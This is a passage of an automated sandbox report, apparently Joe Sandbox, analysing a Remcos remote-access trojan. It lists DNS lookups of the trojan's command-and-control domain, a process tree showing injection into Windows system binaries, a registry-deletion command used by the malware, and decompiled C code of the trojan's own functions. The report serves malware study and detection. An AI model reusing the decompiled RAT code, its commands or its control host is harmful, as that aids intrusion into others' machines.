                                  Sep 21, 2021 22:16:27.142555952 CEST8.8.8.8192.168.2.70x9fb6No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:28.602499008 CEST8.8.8.8192.168.2.70xb6b8No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:30.061834097 CEST8.8.8.8192.168.2.70xa294No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:31.504631042 CEST8.8.8.8192.168.2.70x3dadNo error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:32.975001097 CEST8.8.8.8192.168.2.70xbcceNo error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:34.435005903 CEST8.8.8.8192.168.2.70x401dNo error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:35.865314960 CEST8.8.8.8192.168.2.70xb093No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:38.031744957 CEST8.8.8.8192.168.2.70xb8e1No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:39.476430893 CEST8.8.8.8192.168.2.70x723eNo error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:40.947170019 CEST8.8.8.8192.168.2.70xad60No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:42.515451908 CEST8.8.8.8192.168.2.70xf8acNo error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:44.025924921 CEST8.8.8.8192.168.2.70x42feNo error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:45.825886965 CEST8.8.8.8192.168.2.70x4c86No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:47.432734013 CEST8.8.8.8192.168.2.70x8ea9No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:48.898102045 CEST8.8.8.8192.168.2.70x786aNo error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:50.358386993 CEST8.8.8.8192.168.2.70xe138No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:51.807924032 CEST8.8.8.8192.168.2.70x7d08No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:53.258599997 CEST8.8.8.8192.168.2.70xfd61No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:54.715018034 CEST8.8.8.8192.168.2.70x58d3No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:56.151295900 CEST8.8.8.8192.168.2.70x1e78No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:57.700181007 CEST8.8.8.8192.168.2.70xf320No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:59.150486946 CEST8.8.8.8192.168.2.70x1b6cNo error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:17:00.601574898 CEST8.8.8.8192.168.2.70xac6dNo error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:17:02.036047935 CEST8.8.8.8192.168.2.70x4dc3No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:17:03.537657976 CEST8.8.8.8192.168.2.70x9474No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:17:05.091638088 CEST8.8.8.8192.168.2.70xbf93No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:17:06.771140099 CEST8.8.8.8192.168.2.70x6b1bNo error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:17:08.223980904 CEST8.8.8.8192.168.2.70xa300No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:17:09.661106110 CEST8.8.8.8192.168.2.70x8b1dNo error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:17:11.117923021 CEST8.8.8.8192.168.2.70x3079No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:17:12.589910030 CEST8.8.8.8192.168.2.70x5a4eNo error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)

                                  Code Manipulations

                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  Analysis Process: yVhvGnsUpL.exe PID: 1400 Parent PID: 1744

                                  General

                                  Start time:22:14:56
                                  Start date:21/09/2021
                                  Path:C:\Users\user\Desktop\yVhvGnsUpL.exe
                                  Wow64 process (32bit):true
                                  Commandline:'C:\Users\user\Desktop\yVhvGnsUpL.exe'
                                  Imagebase:0x400000
                                  File size:1133568 bytes
                                  MD5 hash:CF98D2D4D4555323842C8371DB09347E
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:Borland Delphi
                                  Reputation:low

                                  Chronological Activities

                                  Analysis Process: DpiScaling.exe PID: 6728 Parent PID: 1400

                                  General

                                  Start time:22:15:18
                                  Start date:21/09/2021
                                  Path:C:\Windows\SysWOW64\DpiScaling.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\System32\DpiScaling.exe
                                  Imagebase:0xb30000
                                  File size:77312 bytes
                                  MD5 hash:302B1BBDBF4D96BEE99C6B45680CEB5E
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.527624941.0000000010590000.00000040.00000001.sdmp, Author: Joe Security
                                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000C.00000002.527624941.0000000010590000.00000040.00000001.sdmp, Author: unknown
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.523698969.0000000003367000.00000004.00000020.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Author: unknown
                                  Reputation:moderate

                                  Chronological Activities

                                  Analysis Process: cmd.exe PID: 6976 Parent PID: 1400

                                  General

                                  Start time:22:15:24
                                  Start date:21/09/2021
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
                                  Imagebase:0x870000
                                  File size:232960 bytes
                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Chronological Activities

                                  Analysis Process: conhost.exe PID: 6996 Parent PID: 6976

                                  General

                                  Start time:22:15:24
                                  Start date:21/09/2021
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff774ee0000
                                  File size:625664 bytes
                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Chronological Activities

                                  Analysis Process: cmd.exe PID: 7032 Parent PID: 6976

                                  General

                                  Start time:22:15:25
                                  Start date:21/09/2021
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
                                  Imagebase:0x870000
                                  File size:232960 bytes
                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Chronological Activities

                                  Analysis Process: conhost.exe PID: 7040 Parent PID: 7032

                                  General

                                  Start time:22:15:25
                                  Start date:21/09/2021
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff774ee0000
                                  File size:625664 bytes
                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Chronological Activities

                                  Analysis Process: cmd.exe PID: 7048 Parent PID: 1400

                                  General

                                  Start time:22:15:25
                                  Start date:21/09/2021
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' '
                                  Imagebase:0x870000
                                  File size:232960 bytes
                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language

                                  Chronological Activities

                                  Analysis Process: conhost.exe PID: 7080 Parent PID: 7048

                                  General

                                  Start time:22:15:26
                                  Start date:21/09/2021
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff774ee0000
                                  File size:625664 bytes
                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language

                                  Chronological Activities

                                  Analysis Process: reg.exe PID: 7116 Parent PID: 7048

                                  General

                                  Start time:22:15:26
                                  Start date:21/09/2021
                                  Path:C:\Windows\SysWOW64\reg.exe
                                  Wow64 process (32bit):true
                                  Commandline:reg delete hkcu\Environment /v windir /f
                                  Imagebase:0x11a0000
                                  File size:59392 bytes
                                  MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language

                                  Chronological Activities

                                  Analysis Process: conhost.exe PID: 7128 Parent PID: 7116

                                  General

                                  Start time:22:15:27
                                  Start date:21/09/2021
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff774ee0000
                                  File size:625664 bytes
                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language

                                  Chronological Activities

                                  Analysis Process: Srakjle.exe PID: 7144 Parent PID: 3292

                                  General

                                  Start time:22:15:27
                                  Start date:21/09/2021
                                  Path:C:\Users\Public\Libraries\Srakjle\Srakjle.exe
                                  Wow64 process (32bit):true
                                  Commandline:'C:\Users\Public\Libraries\Srakjle\Srakjle.exe'
                                  Imagebase:0x400000
                                  File size:1133568 bytes
                                  MD5 hash:CF98D2D4D4555323842C8371DB09347E
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:Borland Delphi
                                  Antivirus matches:
                                  • Detection: 13%, ReversingLabs

                                  Chronological Activities

                                  Analysis Process: Srakjle.exe PID: 6164 Parent PID: 3292

                                  General

                                  Start time:22:15:36
                                  Start date:21/09/2021
                                  Path:C:\Users\Public\Libraries\Srakjle\Srakjle.exe
                                  Wow64 process (32bit):true
                                  Commandline:'C:\Users\Public\Libraries\Srakjle\Srakjle.exe'
                                  Imagebase:0x400000
                                  File size:1133568 bytes
                                  MD5 hash:CF98D2D4D4555323842C8371DB09347E
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:Borland Delphi

                                  Chronological Activities

                                  Analysis Process: mobsync.exe PID: 4868 Parent PID: 7144

                                  General

                                  Start time:22:15:58
                                  Start date:21/09/2021
                                  Path:C:\Windows\SysWOW64\mobsync.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\System32\mobsync.exe
                                  Imagebase:0x1160000
                                  File size:93184 bytes
                                  MD5 hash:44C19378FA529DD88674BAF647EBDC3C
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Author: Joe Security
                                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Author: unknown
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000002.410957066.0000000010590000.00000040.00000001.sdmp, Author: Joe Security
                                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001C.00000002.410957066.0000000010590000.00000040.00000001.sdmp, Author: unknown
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000002.409833618.0000000000818000.00000004.00000020.sdmp, Author: Joe Security

                                  Chronological Activities

                                  Analysis Process: mobsync.exe PID: 6120 Parent PID: 6164

                                  General

                                  Start time:22:16:14
                                  Start date:21/09/2021
                                  Path:C:\Windows\SysWOW64\mobsync.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\System32\mobsync.exe
                                  Imagebase:0x1160000
                                  File size:93184 bytes
                                  MD5 hash:44C19378FA529DD88674BAF647EBDC3C
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000020.00000002.436621840.0000000010590000.00000040.00000001.sdmp, Author: Joe Security
                                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000020.00000002.436621840.0000000010590000.00000040.00000001.sdmp, Author: unknown
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000020.00000002.435807202.00000000008C8000.00000004.00000020.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000020.00000002.435598601.0000000000720000.00000040.00000001.sdmp, Author: Joe Security
                                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000020.00000002.435598601.0000000000720000.00000040.00000001.sdmp, Author: unknown

                                  Chronological Activities

                                  Disassembly

                                  Code Analysis

                                  Reset < >

                                    Analysis Process: DpiScaling.exe PID: 6728 Parent PID: 1400 DpiScaling.exeCOMMON

                                    Executed Functions

                                    Function 0040CD09, Relevance: 84.1, APIs: 28, Strings: 20, Instructions: 98libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E0040CD09() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;
				_Unknown_base(*)()* _t24;

				_t1 = LoadLibraryA("Psapi.dll"); // executed
				_t2 = GetProcAddress(_t1, "GetModuleFileNameExA");
				 *0x46bd2c = _t2;
				if(_t2 == 0) {
					 *0x46bd2c = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExA");
				}
				 *0x46bd1c = GetProcAddress(LoadLibraryA("Psapi.dll"), "GetModuleFileNameExW");
				if( *0x46bd2c == 0) {
					 *0x46bd1c = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExW");
				}
				 *0x46bd24 = GetProcAddress(LoadLibraryA("ntdll.dll"), "NtUnmapViewOfSection");
				 *0x46bd10 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GlobalMemoryStatusEx");
				 *0x46beac = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
				 *0x46beb0 = GetProcAddress(GetModuleHandleA("kernel32"), "GetComputerNameExW");
				 *0x46bd20 = GetProcAddress(LoadLibraryA("Shell32"), "IsUserAnAdmin");
				 *0x46bd14 = GetProcAddress(GetModuleHandleA("kernel32"), "SetProcessDEPPolicy");
				 *0x46bd30 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayDevicesW");
				 *0x46bd34 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayMonitors");
				 *0x46bd18 = GetProcAddress(GetModuleHandleA("user32"), "GetMonitorInfoW");
				_t24 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), 0xc);
				 *0x46bb04 = _t24;
				return _t24;
			}






                                    0x0040cd1c
                                    0x0040cd25
                                    0x0040cd2d
                                    0x0040cd34
                                    0x0040cd45
                                    0x0040cd45
                                    0x0040cd60
                                    0x0040cd65
                                    0x0040cd76
                                    0x0040cd76
                                    0x0040cd94
                                    0x0040cda8
                                    0x0040cdbc
                                    0x0040cdd0
                                    0x0040cde4
                                    0x0040cdf8
                                    0x0040ce0c
                                    0x0040ce20
                                    0x0040ce31
                                    0x0040ce39
                                    0x0040ce3d
                                    0x0040ce43

                                    APIs
                                    • LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,00000000,Sept-AITAB5,00000001,0040C505), ref: 0040CD1C
                                    • GetProcAddress.KERNEL32(00000000), ref: 0040CD25
                                    • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA), ref: 0040CD40
                                    • GetProcAddress.KERNEL32(00000000), ref: 0040CD43
                                    • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW), ref: 0040CD54
                                    • GetProcAddress.KERNEL32(00000000), ref: 0040CD57
                                    • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW), ref: 0040CD71
                                    • GetProcAddress.KERNEL32(00000000), ref: 0040CD74
                                    • LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 0040CD85
                                    • GetProcAddress.KERNEL32(00000000), ref: 0040CD88
                                    • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 0040CD99
                                    • GetProcAddress.KERNEL32(00000000), ref: 0040CD9C
                                    • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 0040CDAD
                                    • GetProcAddress.KERNEL32(00000000), ref: 0040CDB0
                                    • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW), ref: 0040CDC1
                                    • GetProcAddress.KERNEL32(00000000), ref: 0040CDC4
                                    • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin), ref: 0040CDD5
                                    • GetProcAddress.KERNEL32(00000000), ref: 0040CDD8
                                    • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy), ref: 0040CDE9
                                    • GetProcAddress.KERNEL32(00000000), ref: 0040CDEC
                                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW), ref: 0040CDFD
                                    • GetProcAddress.KERNEL32(00000000), ref: 0040CE00
                                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors), ref: 0040CE11
                                    • GetProcAddress.KERNEL32(00000000), ref: 0040CE14
                                    • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW), ref: 0040CE25
                                    • GetProcAddress.KERNEL32(00000000), ref: 0040CE28
                                    • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C), ref: 0040CE36
                                    • GetProcAddress.KERNEL32(00000000), ref: 0040CE39
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$HandleModule$LibraryLoad
                                    • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtUnmapViewOfSection$Psapi.dll$Sept-AITAB5$SetProcessDEPPolicy$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll.dll$user32
                                    • API String ID: 551388010-280768746
                                    • Opcode ID: 9e74a4b7297bf2b2a58517a95ccdf4e1be594d5622eed8d1bc547594be329630
                                    • Instruction ID: 7f0a72ef543637f7c74f83f283374f20c8e911501c3ee670a040c0af445c8e1c
                                    • Opcode Fuzzy Hash: 9e74a4b7297bf2b2a58517a95ccdf4e1be594d5622eed8d1bc547594be329630
                                    • Instruction Fuzzy Hash: 1F21AEA0E8135875D620BBB29C49E1B2E58DA44B95B204927F205D7191FFFCC540CEEF
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040D0B5, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 46%
                                    			E0040D0B5() {
				signed int _v32;
				void* _t13;
				void* _t22;
				signed int _t62;
				void* _t64;
				void* _t65;
				void* _t67;

				_t64 = (_t62 & 0xfffffff8) - 0x20;
				while(1) {
					_v32 = _v32 & 0x00000000;
					_t53 = L00401F95(0x46c518); // executed
					E00410885(_t10, "override",  &_v32); // executed
					_t13 = _v32 - 1;
					if(_t13 == 0) {
						goto L5;
					}
					_t22 = _t13 - 1;
					if(_t22 == 0) {
						_push(1);
						_t68 = _t64 - 0x18;
						E00407350(0x46c500, _t64 - 0x18, _t53, __eflags, 0x46c500);
						_push(L"pth_unenc");
						L00410B4C(0x80000001, L00401EEB(E004172DA( &_v32, 0x46c518)));
						L00401EF0();
						_push(1);
						E00402084(0x46c500, _t68 + 0x20 - 0x18, "3.2.1 Pro");
						_push("v");
						E00410AA7(0x46c518, L00401F95(0x46c518));
						E0041015B();
						ExitProcess(0);
					}
					_t75 = _t22 != 1;
					if(_t22 != 1) {
						L6:
						Sleep(0xbb8); // executed
						continue;
					}
					L0040AD84();
					L5:
					_push(1);
					_t65 = _t64 - 0x18;
					E00407350(0x46c500, _t65, _t53, _t75, 0x46c500);
					_push(L"pth_unenc");
					L00410B4C(0x80000001, L00401EEB(E004172DA( &_v32, 0x46c518)));
					L00401EF0();
					_push(1);
					_t67 = _t65 + 0x20 - 0x18;
					E00402084(0x46c500, _t67, "3.2.1 Pro");
					_push("v");
					E00410AA7(0x46c518, L00401F95(0x46c518));
					_t64 = _t67 + 0x20;
					goto L6;
				}
			}










                                    0x0040d0bb
                                    0x0040d0ca
                                    0x0040d0ca
                                    0x0040d0e0
                                    0x0040d0e2
                                    0x0040d0ed
                                    0x0040d0f0
                                    0x00000000
                                    0x00000000
                                    0x0040d0f2
                                    0x0040d0f5
                                    0x0040d174
                                    0x0040d176
                                    0x0040d17c
                                    0x0040d181
                                    0x0040d19f
                                    0x0040d1ab
                                    0x0040d1b0
                                    0x0040d1bc
                                    0x0040d1c1
                                    0x0040d1cf
                                    0x0040d1d7
                                    0x0040d1de
                                    0x0040d1de
                                    0x0040d0f7
                                    0x0040d0fa
                                    0x0040d164
                                    0x0040d169
                                    0x00000000
                                    0x0040d169
                                    0x0040d0fc
                                    0x0040d101
                                    0x0040d101
                                    0x0040d103
                                    0x0040d109
                                    0x0040d10e
                                    0x0040d12c
                                    0x0040d138
                                    0x0040d13d
                                    0x0040d13f
                                    0x0040d149
                                    0x0040d14e
                                    0x0040d15c
                                    0x0040d161
                                    0x00000000
                                    0x0040d161

                                    APIs
                                      • Part of subcall function 00410885: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004108A5
                                      • Part of subcall function 00410885: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,0046C518), ref: 004108C3
                                      • Part of subcall function 00410885: RegCloseKey.KERNELBASE(?), ref: 004108CE
                                    • Sleep.KERNELBASE(00000BB8), ref: 0040D169
                                    • ExitProcess.KERNEL32 ref: 0040D1DE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseExitOpenProcessQuerySleepValue
                                    • String ID: 3.2.1 Pro$override$pth_unenc
                                    • API String ID: 2281282204-2083519672
                                    • Opcode ID: e8eef23d0450733ddffb4ed0590df9d184fd0f0211c19a2a612e1f43d34f4dff
                                    • Instruction ID: 08f4d26337d929cf8c522b5db6824f2b5f74010f43e1cc258f687c08e2209bf0
                                    • Opcode Fuzzy Hash: e8eef23d0450733ddffb4ed0590df9d184fd0f0211c19a2a612e1f43d34f4dff
                                    • Instruction Fuzzy Hash: 45212731F443012BD608B6B68C57B6F32969B80708F10042FB8066B2D2FEBDDA45879F
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0042E5CA, Relevance: 4.5, APIs: 3, Instructions: 33encryptionCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 71%
                                    			E0042E5CA(HCRYPTPROV* __ecx, BYTE* __edx, int _a4) {
				int _t2;
				void* _t6;
				BYTE* _t9;
				long** _t10;

				_t10 = __ecx;
				_t9 = __edx;
				_t2 = CryptAcquireContextA(__ecx, 0, 0, 1, 0xf0000000); // executed
				if(_t2 != 0) {
					if(CryptGenRandom( *_t10, _a4, _t9) != 0) {
						CryptReleaseContext( *_t10, 0);
						return 0;
					}
					_push(0xffffff98);
					L2:
					_pop(_t6);
					return _t6;
				}
				_push(0xffffff99);
				goto L2;
			}







                                    0x0042e5d8
                                    0x0042e5da
                                    0x0042e5df
                                    0x0042e5e7
                                    0x0042e5fc
                                    0x0042e606
                                    0x00000000
                                    0x0042e60c
                                    0x0042e5fe
                                    0x0042e5eb
                                    0x0042e5eb
                                    0x00000000
                                    0x0042e5eb
                                    0x0042e5e9
                                    0x00000000

                                    APIs
                                    • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,00000000,00000001,?,0042E381,00000024,?,00000000,?), ref: 0042E5DF
                                    • CryptGenRandom.ADVAPI32(00000000,00000000,?,?,0042E381,00000024,?,00000000,?,?,?,?,?,?,?,00428BA3), ref: 0042E5F4
                                    • CryptReleaseContext.ADVAPI32(00000000,00000000,?,0042E381,00000024,?,00000000,?,?,?,?,?,?,?,00428BA3,?), ref: 0042E606
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Crypt$Context$AcquireRandomRelease
                                    • String ID:
                                    • API String ID: 1815803762-0
                                    • Opcode ID: be640132c4cc09921de464d7efa084b83adc683f71156fedcc3855f66cb2cb71
                                    • Instruction ID: 38117f8ee5779777ede6d5b7ba3ea51b7ecd80fb833ca9539c352c605c5c0cae
                                    • Opcode Fuzzy Hash: be640132c4cc09921de464d7efa084b83adc683f71156fedcc3855f66cb2cb71
                                    • Instruction Fuzzy Hash: 46F06D31318324BBEB310F56FC19F573E99EB81BA6FA00536F209E50E4E6628940865C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00416D9E, Relevance: 3.0, APIs: 2, Instructions: 41COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 82%
                                    			E00416D9E(void* __ecx, void* __edi, void* __eflags) {
				char _v8;
				long _v12;
				char _v36;
				char _v60;
				char _v92;
				short _v604;
				void* _t26;
				void* _t38;
				void* _t39;

				_t39 = __eflags;
				_v8 = 0x10;
				_t38 = __ecx;
				 *0x46beb0(1,  &_v92,  &_v8); // executed
				_v12 = 0x100;
				GetUserNameW( &_v604,  &_v12); // executed
				E004030A6(_t26, _t38, E00404405(_t26,  &_v36,  &_v92, _t39, E0040427F(_t26,  &_v60, "/")), __edi, _t39,  &_v604);
				L00401EF0();
				L00401EF0();
				return _t38;
			}












                                    0x00416d9e
                                    0x00416dab
                                    0x00416db6
                                    0x00416dbb
                                    0x00416dc4
                                    0x00416dd3
                                    0x00416dfe
                                    0x00416e07
                                    0x00416e0f
                                    0x00416e1a

                                    APIs
                                    • GetComputerNameExW.KERNEL32(00000001,?,00000028,0046C578), ref: 00416DBB
                                    • GetUserNameW.ADVAPI32(?,00000037), ref: 00416DD3
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Name$ComputerUser
                                    • String ID:
                                    • API String ID: 4229901323-0
                                    • Opcode ID: be6cad12c344e77614ab7161f93b502ddfc4643f3128554765fcc8d2a5d5d92a
                                    • Instruction ID: 97ef4402937901d3963fe518a4296ad78cd3b90a883e9fb2300271c61e114a9f
